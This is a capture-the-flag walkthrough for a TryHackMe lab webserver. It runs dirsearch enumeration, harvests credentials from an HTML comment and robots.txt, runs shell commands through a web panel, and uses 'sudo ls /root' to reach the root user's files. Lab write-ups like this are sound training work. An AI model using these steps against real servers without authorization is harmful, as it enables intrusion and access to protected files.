## Version 2.0
## language: en

Feature:

  Site:
    TryHackMe
  Category:
    CTF
  User:
    julian9816
  Goal:
    Requires you to exploit a webserver to find 3 ingredients

  Background:
  Hacker's software:
    | <Software name> |  <Version>  |
    |  Windows 10 pro |  10.0.18362 |
    |      Brave      |    1.976    |
    |      Python     |     3.7     |
    |     dirsearch   |    0.3.9    |

  Machine information:
    Given I am accessing the 10.10.16.229 through a VPN
    And is running on port 80

  Scenario: Success : Searching in the html source code trought
  Brave element inspector
    Given I opened te following url
    """
    http://10.10.16.229
    """
    And Open inpector to see the html code
    Then I read the html code to try find a clue
    And I find the username in a comment line
    """
    <!--

    Note to self, remember username!
    Username: R1ckRul3s

    -->
    """
  Scenario: Success : Search directories and i try login in this page
    Given I execute dirsearch.py
    """
    python dirsearch.py -u http://10.10.16.229 -e php
    """
    Then I obtain the following directories
    """
    [20:38:23] 200 -    1KB - /index.html
    [20:38:30] 200 -  882B  - /login.php
    [20:38:54] 200 -   17B  - /robots.txt
    """
    Then I open the robots.txt to try find a clue
    """
    http://10.10.16.229/robots.txt
    """
    And I obtain a text
    """
    Wubbalubbadubdub
    """
    Then I open the following url
    """
    http://10.10.16.229/login.php
    """
    And I put in this information formulary login form
    """
    username: R1ckRul3s
    password: Wubbalubbadubdub
    """
    Then I was able to login correctly
    And In this page i have a box where i can put commands
    Then I put the command
    """
    ls
    """
    And I obtain
    """
    Sup3rS3cretPickl3Ingred.txt
    assets
    clue.txt
    """
    Then I try to open the text archive
    """
    less Sup3rS3cretPickl3Ingred.txt
    """
    And I obtain a text and i put this text in the first ingredient
    And I pass the task What is the first ingredient?
    Then I open the text archive to try find a clue
    """
    less clue.txt
    """
    And I obtain the following
    """
    Look around the file system for the other ingredient.
    """
    Then I try to open the directory /home/rick to try find a clue
    """
    ls /home/rick
    """
    And I obtain
    """
    second ingredients
    """
    Then I try open the archive second ingredients
    """
    less second ingredients
    """
    And I obtain a text and i put this text in the second ingredient
    And I pass the task What is the second ingredient?
    Then I try to find a third ingredient
    """
    sudo ls /root
    """
    And I obtain
    """
    3rd.txt
    """
    Then I try to open this archive
    """
    less 3rd.txt
    """
    And I obtein a text and i put this text in the third ingredient
    And I pass the task What is the third ingredient?
    And I pass the challenge
